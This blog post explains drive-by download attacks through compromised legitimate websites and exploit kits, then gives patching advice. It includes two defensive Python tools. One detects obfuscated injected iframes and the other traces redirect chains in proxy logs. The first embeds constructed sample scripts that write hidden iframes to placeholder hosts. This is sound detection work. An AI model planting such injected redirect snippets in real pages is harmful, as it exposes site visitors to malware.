Wednesday, December 23, 2009

Phani's TechMedia


When Legitimate Sites Threaten Your Network


Activity online, but more recently, hackers have compromised
legitimate Web sites and planted redirect code that silently
launches attacks via the browser.
One high-profile web site compromise in 2007 provides a
glimpse into how drive-by downloads are launched against
computer users. In the weeks leading up to the NFL Super
Bowl game, Miami’s Dolphin Stadium site was hacked and
rigged with a snippet of JavaScript code.
A visitor to that site with an unpatched Windows machine was
silently connected to a remote third-party that attempted to
exploit known vulnerabilities described by Microsoft’s MS06-014
(the MDAC RDS.Dataspace ActiveX flaw) and MS07-004 (the VML
remote code execution flaw) security bulletins. If an exploit was successful,
a Trojan was silently installed that gave the attacker full access
to the compromised computer. The attackers could later
take advantage of the compromised computer in order to steal
confidential information or to launch denial-of-service attacks.
Later in 2007, the high-traffic “Bank of India” web site was
hijacked by hackers in a sophisticated attack that used multiple
redirects to send Windows users to a server hosting an
e-mail worm file, two stealth rootkits, two Trojan downloaders,
and three backdoor Trojans. The Bank of India compromise
combined JavaScript obfuscation, multiple iframe redirect
hops, and fast-flux DNS techniques to avoid detection and to keep
malicious servers online during the attack. The original paper
includes a screenshot of the compromised Bank of India site
showing the malicious script used to launch the drive-by
download attack; the image is not reproduced here.
These are just two examples to highlight the extent of the
problem on legitimate web sites. According to data from
ScanSafe, a company that tracks web-based malware threats,
74 percent of all malware spotted in the third quarter of 2008
came from visits to compromised web sites.
Attackers are also known to have used poisoned third-party
advertising servers to redirect Windows users to rogue servers
that are hosting drive-by downloads. These malicious
ads (malvertisements) are typically Flash-based and exploit
unpatched desktop applications.
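Both compromises above come down to the same thing in the page source: a short injected script that decodes itself at load time and writes an invisible iframe pointing at an attacker-controlled host. The following is an added example, not code from the original paper, of a static check a web admin can run against their own pages to catch exactly that. The sample page, the script snippets and the *.invalid hostnames are constructed placeholders; the regex-based decoding of `unescape()` and `String.fromCharCode()` handles the two encodings the text describes and does not execute any script.

```python
"""Find injected, hidden iframes in a web page, including ones that an
obfuscated script writes into the page at load time.

Added example for this post (not code from the original paper). The sample page
and the *.invalid hostnames are constructed placeholders, not real sites.
"""
import re
from urllib.parse import unquote, urlparse

# Constructed sample: one legitimate iframe, one script in the style of the
# Dolphin Stadium snippet (unescape), one in the Bank of India style (fromCharCode).
_HOP2_MARKUP = '<iframe src="http://hop2.example.invalid/" style="display:none"></iframe>'
_HOP2_CODES = ",".join(str(ord(c)) for c in "document.write('" + _HOP2_MARKUP + "')")
SAMPLE_HTML = (
    '<html><head><title>Stadium news</title></head><body>\n'
    '<h1>Game day parking</h1>\n'
    '<iframe src="/video/player.html" width="640" height="360"></iframe>\n'
    '<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fhop1.example.invalid'
    '%2Fin.cgi%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"))</script>\n'
    '<script>eval(String.fromCharCode(' + _HOP2_CODES + '))</script>\n'
    '</body></html>\n'
)

_FROMCHARCODE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]+)\)')
_UNESCAPE = re.compile(r'unescape\(\s*(["\'])(.*?)\1\s*\)', re.S)
_SCRIPT = re.compile(r'<script\b[^>]*>(.*?)</script>', re.I | re.S)
_IFRAME = re.compile(r'<iframe\b([^>]*)>', re.I)
_ATTR = re.compile(r'([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX code units first, then %XX bytes."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def deobfuscate(script, max_rounds=5):
    """Replace fromCharCode()/unescape() calls with the text they decode to,
    repeating so that layered encodings (a decoded string that is itself
    encoded) are peeled off. Nothing is executed; this is string rewriting."""
    for _ in range(max_rounds):
        new = _FROMCHARCODE.sub(
            lambda m: ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip()), script)
        new = _UNESCAPE.sub(lambda m: js_unescape(m.group(2)), new)
        if new == script:
            break
        script = new
    return script


def parse_attrs(raw):
    """Attribute name -> value for one tag; handles quoted and bare values."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or '')
            for m in _ATTR.finditer(raw)}


def is_hidden(attrs):
    """True for the size and style tricks used to keep a redirect frame invisible."""
    style = attrs.get('style', '').replace(' ', '').lower()

    def tiny(v):
        try:
            return int(v.rstrip('px')) <= 1
        except ValueError:
            return False
    return ((tiny(attrs.get('width', '')) and tiny(attrs.get('height', '')))
            or 'display:none' in style or 'visibility:hidden' in style
            or re.search(r'(left|top):-\d', style) is not None)


def find_hidden_iframes(html, site_host):
    """Return hidden iframes whose src points off-site, whether they appear in the
    raw markup or only in the output of a decoded inline script."""
    corpus = html + '\n' + '\n'.join(deobfuscate(s) for s in _SCRIPT.findall(html))
    findings, seen = [], set()
    for m in _IFRAME.finditer(corpus):
        attrs = parse_attrs(m.group(1))
        src = attrs.get('src', '')
        host = urlparse(src).hostname or site_host   # a relative src stays on-site
        if src in seen or host == site_host or not is_hidden(attrs):
            continue
        seen.add(src)
        findings.append({'src': src, 'host': host, 'attrs': attrs})
    return findings


if __name__ == '__main__':
    for f in find_hidden_iframes(SAMPLE_HTML, 'www.stadium-example.invalid'):
        print('hidden off-site iframe ->', f['src'])
```

Run against the sample, the visible on-site video frame is ignored and the two decoded frames (hop1 via `unescape`, hop2 via `fromCharCode`) are reported. Kits change their encoding regularly, so treat this as a tripwire for a diff between what you published and what the server is now serving, not as a complete deobfuscator.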


Drive-By Download Engines
Malware exploit kits serve as the engine for drive-by downloads.
These kits are professionally written software components
that can be hosted on a server with a database backend.
The kits, which are sold on underground hacker sites, are fitted
with exploits for vulnerabilities in a range of widely deployed
desktop applications, including Apple’s QuickTime media
player, Adobe Flash Player, Adobe Reader, RealNetworks’ RealPlayer
and WinZip.
Browser-specific exploits have also been used, targeting
Microsoft’s Internet Explorer, Mozilla’s Firefox, Apple Safari, and
Opera. Several targeted exploit kits are fitted only with attack
code for Adobe PDF vulnerabilities or known flaws in ActiveX
controls.
Identity thieves and other malware authors purchase exploit
kits and deploy them on a malicious server. Code to redirect
traffic to that malicious server is then embedded on web sites,
and lures to those sites are spammed via e-mail or bulletin
boards.
An exploit kit server can use HTTP request headers from a
browser visit to determine the visitor’s browser type and
version as well as the underlying operating system. Once the
target operating system is fingerprinted, the exploit kit can
determine which exploits to fire.
In some cases, several exploits can be sent at the same time,
attempting to compromise a machine via third-party application
vulnerabilities. Some of the more sophisticated exploit
kits are well maintained and updated with software exploits
on a monthly basis. The kits come with a well-designed user
interface that stores detailed data about successful attacks.
The data includes the operating system versions exploited,
the target’s country of origin, which exploit was used, and the
success rate of each exploit relative to traffic to the malicious site.
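From the network side, the sequence this section describes (lure or compromised page, one or more redirect hops, a kit landing page that fingerprints the browser from its request headers, an exploit file such as a PDF or Flash object, then the executable) leaves a recognisable trail in web proxy logs. The following is an added example, not code from the original paper, that reconstructs per-client redirect chains from Referer headers and flags that pattern. The log lines, field layout (tab-separated time, client, URL, status, Content-Type, Referer, User-Agent) and hostnames are constructed for the example; the User-Agent is kept in the alert because it is the value the kit used to choose its exploits and therefore tells you which desktop software to check first.

```python
"""Reconstruct redirect chains from web proxy logs and flag the drive-by pattern:
a legitimate site, one or more redirect hops, exploit-carrier files (PDF/Flash)
from the hop hosts, then an executable download, all within seconds.

Added example for this post (not code from the original paper). The log lines
and hostnames below are constructed; the field layout is assumed to be
tab-separated time, client, URL, status, Content-Type, Referer, User-Agent.
"""
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlparse

PAYLOAD_TYPES = {'application/octet-stream', 'application/x-msdownload'}
CARRIER_TYPES = {'application/pdf', 'application/x-shockwave-flash', 'video/quicktime'}

UA_IE6_XP = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'   # what the kit fingerprints
_ROWS = [  # constructed sample log
    ('12:00:01', '10.0.0.5', 'http://www.bank-example.invalid/', '200', 'text/html', '-', UA_IE6_XP),
    ('12:00:02', '10.0.0.5', 'http://www.bank-example.invalid/css/site.css', '200', 'text/css',
     'http://www.bank-example.invalid/', UA_IE6_XP),
    ('12:00:02', '10.0.0.5', 'http://hop1.example.invalid/in.cgi?4', '200', 'text/html',
     'http://www.bank-example.invalid/', UA_IE6_XP),
    ('12:00:03', '10.0.0.5', 'http://hop2.example.invalid/index.php', '200', 'text/html',
     'http://hop1.example.invalid/in.cgi?4', UA_IE6_XP),
    ('12:00:04', '10.0.0.5', 'http://hop2.example.invalid/pdf.php', '200', 'application/pdf',
     'http://hop2.example.invalid/index.php', UA_IE6_XP),
    ('12:00:06', '10.0.0.5', 'http://hop3.example.invalid/load.php?id=7', '200',
     'application/octet-stream', 'http://hop2.example.invalid/index.php', UA_IE6_XP),
    # benign: a vendor download page linking to its own update host
    ('12:05:00', '10.0.0.9', 'http://www.vendor-example.invalid/downloads', '200', 'text/html', '-', UA_IE6_XP),
    ('12:05:03', '10.0.0.9', 'http://updates.vendor-example.invalid/setup.exe', '200',
     'application/octet-stream', 'http://www.vendor-example.invalid/downloads', UA_IE6_XP),
]
SAMPLE_LOG = '\n'.join('\t'.join(r) for r in _ROWS)


@dataclass
class Req:
    t: int
    client: str
    url: str
    status: int
    ctype: str
    referer: str
    ua: str

    @property
    def host(self):
        return urlparse(self.url).hostname or ''


def parse_line(line):
    """One tab-separated log line -> Req (time as seconds since midnight)."""
    ts, client, url, status, ctype, referer, ua = line.rstrip('\n').split('\t')
    h, m, s = (int(x) for x in ts.split(':'))
    return Req(h * 3600 + m * 60 + s, client, url, int(status),
               ctype.split(';')[0].strip().lower(), '' if referer == '-' else referer, ua)


def is_payload(r):
    return r.status == 200 and (r.ctype in PAYLOAD_TYPES or urlparse(r.url).path.lower().endswith('.exe'))


def referer_chain(reqs, end):
    """Walk Referer headers backwards through earlier requests by the same client.
    A hop that strips Referer simply ends the chain early."""
    chain, seen, cur = [end], {end.url}, end
    while cur.referer and cur.referer not in seen:
        earlier = [r for r in reqs if r.client == cur.client and r.url == cur.referer and r.t <= cur.t]
        if not earlier:
            break
        cur = max(earlier, key=lambda r: r.t)   # the most recent matching request
        seen.add(cur.url)
        chain.append(cur)
    chain.reverse()
    return chain


def find_driveby_chains(lines, window=60):
    reqs = sorted((parse_line(l) for l in lines if l.strip()), key=lambda r: r.t)
    by_client = defaultdict(list)
    for r in reqs:
        by_client[r.client].append(r)
    alerts = []
    for client, rs in by_client.items():
        for payload in filter(is_payload, rs):
            chain = referer_chain(rs, payload)
            hosts = list(dict.fromkeys(c.host for c in chain))     # in order, deduplicated
            hop_hosts = set(hosts[1:])
            carriers = [c.url for c in rs
                        if chain[0].t <= c.t <= payload.t and c.host in hop_hosts and c.ctype in CARRIER_TYPES]
            # Heuristic: origin -> at least one redirect host -> payload host, or a single
            # off-origin host that served an exploit carrier before the executable.
            if payload.t - chain[0].t <= window and (len(hosts) >= 3 or (len(hosts) >= 2 and carriers)):
                alerts.append({'client': client, 'hosts': hosts, 'payload': payload.url,
                               'carriers': carriers, 'user_agent': payload.ua,
                               'seconds': payload.t - chain[0].t})
    return alerts


if __name__ == '__main__':
    for a in find_driveby_chains(SAMPLE_LOG.splitlines()):
        print(a['client'], ' -> '.join(a['hosts']), 'in', a['seconds'], 's; carriers:', a['carriers'])
```

On the sample, the client at 10.0.0.5 is flagged with a four-host chain completed in five seconds and a PDF served by a hop host on the way, while the vendor download on 10.0.0.9 (two hosts, no carrier) is not. Referer-based reconstruction is deliberately conservative: a chain that loses its Referer at some hop still surfaces, just as a shorter chain, and the time window stops ordinary browsing across many sites from being stitched together.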
The Unpatched Desktop
The drive-by download epidemic is largely attributed to the
unpatched state of the Windows ecosystem. With very few
exceptions, the exploits in circulation target software vulnerabilities
that are known – and for which patches are available.
However, for a variety of reasons, end users are slow to apply
the necessary software fixes.
Microsoft’s Automatic Updates mechanism offers end
users a valuable way to keep operating system vulnerabilities
patched, but the same cannot be said for third-party desktop
applications. Secunia, a company that tracks software vulnerabilities,
estimates that about one-third of all deployed desktop
applications are vulnerable to a known (patched) security
issue.
The most practical approach to defending against drive-by
downloads is to pay close attention to the patch-management
component of defense. Specifically, users should:
• Use a patch management solution that assists with
finding – and fixing – all third-party desktop applications.
Secunia offers two tools – Personal Software
Inspector and Network Security Inspector – that can
help identify unpatched applications.
• Use a desktop browser that includes anti-phishing and
anti-malware blockers. Microsoft’s Internet Explorer,
Mozilla Firefox, and Opera all provide security features
to block malicious sites.
• Enable a firewall and apply all Microsoft operating
system updates. Avoid using pirated software, which fails
Windows Genuine Advantage (WGA) validation and is cut off
from updates.
• Install anti-virus/anti-malware software and be sure to
keep its databases updated. Make sure your anti-virus
provider is using a browser traffic scanner to help
pinpoint potential problems from drive-by downloads.

